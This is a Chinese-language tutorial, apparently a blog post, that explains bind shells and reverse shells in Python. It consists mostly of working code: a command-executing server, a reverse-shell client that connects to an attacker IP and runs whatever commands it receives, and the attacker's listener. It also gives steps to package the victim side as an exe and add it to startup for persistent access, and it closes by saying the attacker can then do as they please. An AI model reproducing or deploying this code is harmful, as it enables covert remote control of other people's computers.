python shell與反彈shell 正常shell需要先在攻擊端開機情況下開啟程式,然後攻擊端運行程式,才能連接 反彈shell,攻擊端是服務端,被攻擊端是客戶端正常shell,攻擊端是客戶端,被攻擊端是服務端 反彈shell,先啟用服務端,再啟用客戶端 反彈shell的好處就是:一旦被攻擊端 ...
python shell與反彈shell
正常shell需要先在攻擊端開機情況下開啟程式,然後攻擊端運行程式,才能連接
反彈shell,攻擊端是服務端,被攻擊端是客戶端
正常shell,攻擊端是客戶端,被攻擊端是服務端
反彈shell,先啟用服務端,再啟用客戶端
反彈shell的好處就是:一旦被攻擊端開機,立即連接上攻擊端(需要攻擊端一直運行)
shell:
客戶端:
import socket s=socket.socket() s.connect(("192.168.0.114",1234)) #連接的伺服器的ip地址,埠 for i in range(10): com=input("command:") s.send(com.encode()) #發送信息 d=s.recv(1024) #接受數據的大小 print(d.decode(),len(d))
服務端:
#伺服器端 import socket import os s=socket.socket() #創建套接字 #s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.bind(('0.0.0.0',1234)) #綁定地址和埠#0.0.0.0接收任意客戶端ip連接 s.listen(5) #調用listen方法開始監聽埠,傳入的參數為等待連接的最大數量 con,addr=s.accept() #接受一個客戶端的連接 #print(con,addr) for i in range(10): cmd=con.recv(1024) print(cmd) command=cmd.decode() if command.startswith("cd"): os.chdir(command[2:].strip()) #切換路徑 result=os.getcwd() #顯示路徑 else: result=os.popen(command).read() if result: con.send(result.encode()) else: con.send(b"OK!")
測試:(客戶端(win10)、服務端(win7))
1.把服務端打包成exe文件,然後在win7運行打包好的exe文件,python打包成exe文件這裡推薦pyinstaller模塊(需要安裝,安裝方法不會的百度)
打包成exe文件時最好打包成文件夾,如何打包成單個exe文件,在win7中運行可能會出題。下圖就是打包的文件夾,雙擊運行圖中exe文件
2.在win10運行客戶端
反彈shell:
客戶端:
#反彈shell,攻擊端是服務端,被攻擊端是客戶端 #正常shell,攻擊端是客戶端,被攻擊端是服務端 #例:攻擊端(win10),被攻擊端(win7),正常shell,先在win7啟動服務端,再在win10啟用客戶端 # 反彈shell,先在win10啟用服務端,再在win7啟用客戶端 # 反彈shell的好處就是:一旦被攻擊端開機,立即連接上攻擊端(需要攻擊端一直運行) # 正常shell需要先在攻擊端開機情況下開啟程式,然後攻擊端運行程式,才能連接 import socket import os import sys import time #print(sys.argv) #hacker=sys.argv[1] hacker="192.168.0.144" port=1234 server=(hacker,port) s=socket.socket() s.connect(server) while 1: # 得到被攻擊端的所在目錄,併發送 dir=os.getcwd() #print(dir) s.send(dir.encode()) # 接收來自攻擊端(伺服器端)的命令,併進行處理 cmd=s.recv(1024).decode() # 對接收的命令做出判斷 # 退出 if cmd=="exit": break elif cmd.startswith("cd"): os.chdir(cmd[2:].strip()) result="切換目錄成功!" else: result=os.popen(cmd).read() if not result: result="命令執行完畢!" s.send(result.encode()) time.sleep(1) s.close() print("退出!")
服務端:
import socket import time server=("0.0.0.0",1234) s=socket.socket() s.bind(server) s.listen(5) con,addr=s.accept() print(addr,"已經接入!") while 1: #接收來自被攻擊端的所在目錄 dir=con.recv(1024).decode() cmd=input(dir+":").strip() con.send(cmd.encode()) if cmd=="exit": break result=con.recv(65365) print(result.decode()) time.sleep(1) s.close() print("退出!")
測試:
1.先在win10運行反彈shell服務端
2.再把反彈shell客戶端打包成exe文件夾,複製到win7中,然後雙擊運行
3.這時可以看到服務端(win10)已經和客戶端(win7)連接上了。#只要服務端一直運行,如果把客戶端的程式加入到開機自啟,這樣客戶端已開啟就被連接到服務端 
4.接下就可以為所欲為了 
